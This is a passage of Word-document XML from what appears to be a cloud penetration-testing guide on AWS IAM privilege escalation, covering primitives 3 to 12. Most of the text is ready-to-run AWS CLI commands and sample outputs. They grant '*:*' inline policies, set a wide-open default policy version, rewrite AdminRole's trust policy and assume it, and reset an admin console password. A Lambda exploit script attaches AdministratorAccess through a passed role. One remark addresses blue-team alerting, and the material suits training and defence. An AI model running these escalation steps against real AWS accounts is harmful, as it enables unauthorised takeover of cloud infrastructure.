    <w:p w14:paraId="4CA6B76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{"PolicyName": "ci-deploy-bot-base", "PolicyArn": "arn:aws:iam::444455556666:policy/ci-deploy-bot-base"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D64F38"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62A9F3A7"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2CF5457B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3  Primitive 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PutUserPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutRolePolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PutGroupPolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5877442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Inline-policy variant of the attach primitive. Add a new inline policy granting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727F0035"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aws iam put-user-policy --user-name ci-deploy-bot \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D37E240"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--policy-name escalate \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EF616E"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 xml:space="preserve">  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01798AF0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4  Primitive 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreatePolicyVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SetAsDefault=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3C1B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If your principal can create a new version of an existing customer-managed policy it uses, write a wide-open version and mark it default. The principal now has whatever the new version grants, regardless of what the previous version said.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBBA51"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create-policy-version --policy-arn arn:aws:iam::444455556666:policy/ci-deploy-bot-base \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E767D1"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 xml:space="preserve">  --policy-document file://wide.json --set-as-default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00868978"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445475D5"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"PolicyVersion": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739352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"VersionId": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>v5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>", "IsDefaultVersion": true, "CreateDate": "2026-04-20T14:14:00Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9BCF0"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xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892290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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C528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blue team that sees </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CreatePolicyVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a policy they care about should alert immediately. This primitive is what CloudGoat's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam_privesc_by_rollback</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> scenario teaches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736B0E0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.5  Primitive 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:SetDefaultPolicyVersion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682C652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Sibling of the above: if a prior version was wide-open and someone rolled back to a strict one, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>SetDefaultPolicyVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>re-elevates by re-selecting the wider version. Does not require creating new content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A326D75" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.6  Primitive 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:UpdateAssumeRolePolicy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9DC98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your principal can modify the trust policy of a role, rewrite the trust to include yourself as principal, then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. Works regardless of the role's identity policy — if it is a privileged role, you inherit the privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48A6A4"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update-assume-role-policy --role-name AdminRole \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212DCBAE"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 xml:space="preserve">  --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"AWS":"arn:aws:iam::444455556666:user/ci-deploy-bot"},"Action":"sts:AssumeRole"}]}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB8D7A"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sts assume-role --role-arn arn:aws:iam::444455556666:role/AdminRole --role-session-name recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F752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{"Credentials": {"AccessKeyId": "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIA...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>", ...}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E78D6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.7  Primitive 7: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + compute service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664EACD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This is the single most common privilege-escalation primitive in the wild. The pattern: your principal has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on some role </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> the ability to create a resource in a compute service that runs as that role. The role then executes arbitrary code that calls whatever it is permitted to. The compute services with this shape:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A95B0"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ec2:RunInstances</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instance-profile RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5D875D"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lambda:CreateFunction</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Lambda RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121EA92B"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glue:CreateJob</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Glue job RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4C9ACE"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glue:CreateDevEndpoint</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Glue dev endpoint shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBB5EA"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cloudformation:CreateStack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UpdateStack</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CFN RCE via custom resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDEAD20"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sagemaker:CreateNotebookInstance</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notebook shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A4534E"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datapipeline:CreatePipeline</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pipeline RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CB764"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ecs:RegisterTaskDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ecs:RunTask</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ECS task RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B4724A"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codebuild:CreateProject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>codebuild:StartBuild</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build-container RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A913722"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batch:RegisterJobDefinition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>batch:SubmitJob</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Batch RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFCDA4E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>stepfunctions:CreateStateMachine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:PassRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> → state-machine-driven role takeover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524FE310"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cat exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC6B90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import boto3, os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5F234"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this runs inside the Lambda as the passed role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E197D7E"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iam = boto3.client('iam')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F04B5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iam.attach_user_policy(UserName='ci-deploy-bot', PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478789D8"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zip exploit.zip exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C00E9E"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lambda create-function \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD9380" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  --function-name pwner --runtime python3.12 --role arn:aws:iam::444455556666:role/AdminExecRole \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52104FA5"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 xml:space="preserve">  --handler exploit.handler --zip-file fileb://exploit.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CC44F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lambda invoke --function-name pwner /tmp/out.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757F3B6E"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{"StatusCode": 200, "ExecutedVersion": "$LATEST"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D17DA88"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iam list-attached-user-policies --user-name ci-deploy-bot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072758B8"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AdministratorAccess now attached ...}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B833EFF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.8  Primitive 8: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:UpdateLoginProfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514804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Changes the console password of any existing IAM user whose name you know. If the user also has the ability to call privileged APIs, you now have console access as that user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8ABE46" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F1EC"/>
        <w:spacing w:before="192" w:after="192"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws iam update-login-profile --user-name admin --password 'N3w-Pass-2026!' --no-password-reset-required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB25506" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.9  Primitive 9: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:CreateLoginProfile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3374BFF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Creates a console password for an IAM user who previously had no console access (programmatic-only). Useful when the target user has only an access key pair but broad permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F53914" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.10  Primitive 10: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:AddUserToGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B7FA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Add yourself to a privileged group (often named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>admins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>powerusers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>). Group membership inherits the group's attached policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7CAC71" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">8.11  Primitive 11: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>to an over-permissive role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF03A4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a role's trust policy admits your principal (explicitly or via wildcard), and that role is more privileged, assuming it is escalation. CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>role-trusts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> module surfaces these candidates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F782DE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>8.12  Primitive 12: tag-based ABAC bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17643B6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Policies that condition on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws:ResourceTag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws:PrincipalTag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be bypassed if your principal has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>iam:TagUser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
